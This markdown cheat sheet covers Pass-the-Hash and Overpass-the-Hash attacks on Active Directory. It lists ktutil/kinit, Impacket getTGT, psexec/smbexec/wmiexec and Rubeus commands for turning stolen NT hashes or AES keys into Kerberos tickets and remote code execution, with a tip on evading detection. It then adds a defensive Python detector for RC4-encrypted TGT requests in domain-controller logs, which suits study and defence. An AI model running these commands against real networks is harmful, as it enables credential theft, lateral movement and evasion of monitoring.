# PTH and Over PTH

## Pass the Hash

On a Linux host with MIT Kerberos, build a keytab from the NT hash with `ktutil`, then use it to obtain a TGT:

```
ktutil
addent -p <user>@<fqdn_domain> -k 1 -key -e rc4-hmac
# paste the NT hash when ktutil prompts for the key
wkt /tmp/a.keytab
exit
kinit -V -k -t /tmp/a.keytab -f <user>@<fqdn_domain>
klist
```
## Overpass the Hash

> **Tip:** Use AES keys to stay stealth.

### Impacket

Request a TGT:

```
python getTGT.py <domain>/<user> -hashes [lm:]<ntlm>
python getTGT.py <domain>/<user> -aesKey <aes_key>
python getTGT.py <domain>/<user>:<password>
```

Set the TGT for Impacket:

```
export KRB5CCNAME=<tgt.file>
```

RCE via ticket:

```
python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass
```
### Rubeus

Ask and inject:

```
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
```
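The tip about AES keys and the `/rc4:` option above are the attacker's side of a detection defenders run on domain-controller logs: a successful Kerberos TGT request (Event ID 4768) whose ticket encryption type is RC4-HMAC (0x17) stands out in a domain where AES is the norm. The following Python is an added example, not part of this cheat sheet; the pipe-delimited event lines, account names and IP addresses are constructed.

```python
"""Flag Kerberos TGT requests (Event ID 4768) that were issued with RC4-HMAC."""
from dataclasses import dataclass

# Ticket encryption types as they appear in the 4768 TicketEncryptionType field.
RC4_HMAC = 0x17
AES128_CTS = 0x11
AES256_CTS = 0x12


@dataclass
class TgtRequest:
    account: str
    client_ip: str
    ticket_enctype: int
    result_code: int  # 0x0 means the KDC issued the ticket


def parse_4768(line: str) -> TgtRequest:
    """Parse one constructed key=value|key=value rendering of a 4768 event."""
    fields = dict(kv.split("=", 1) for kv in line.split("|"))
    return TgtRequest(
        account=fields["TargetUserName"],
        client_ip=fields["IpAddress"],
        ticket_enctype=int(fields["TicketEncryptionType"], 16),
        result_code=int(fields["Status"], 16),
    )


def find_rc4_tgt_requests(lines, known_legacy=frozenset()):
    """Return successful TGT requests that used RC4 from accounts not on the legacy allowlist."""
    hits = []
    for line in lines:
        ev = parse_4768(line)
        if ev.result_code != 0:  # failed requests are handled by other rules
            continue
        if ev.ticket_enctype == RC4_HMAC and ev.account not in known_legacy:
            hits.append(ev)
    return hits


SAMPLE_EVENTS = [  # constructed sample lines, not real telemetry
    "EventID=4768|TargetUserName=alice|IpAddress=10.0.0.5|TicketEncryptionType=0x12|Status=0x0",
    "EventID=4768|TargetUserName=svc_backup|IpAddress=10.0.0.9|TicketEncryptionType=0x17|Status=0x0",
    "EventID=4768|TargetUserName=bob|IpAddress=10.0.0.7|TicketEncryptionType=0x17|Status=0x0",
    "EventID=4768|TargetUserName=carol|IpAddress=10.0.0.8|TicketEncryptionType=0x17|Status=0x6",
]

if __name__ == "__main__":
    for ev in find_rc4_tgt_requests(SAMPLE_EVENTS, known_legacy={"svc_backup"}):
        print(f"RC4 TGT issued to {ev.account} from {ev.client_ip}")
```

Accounts that legitimately still need RC4 (old service accounts with `msDS-SupportedEncryptionTypes` limited to RC4) go on the allowlist so the rule stays quiet for them.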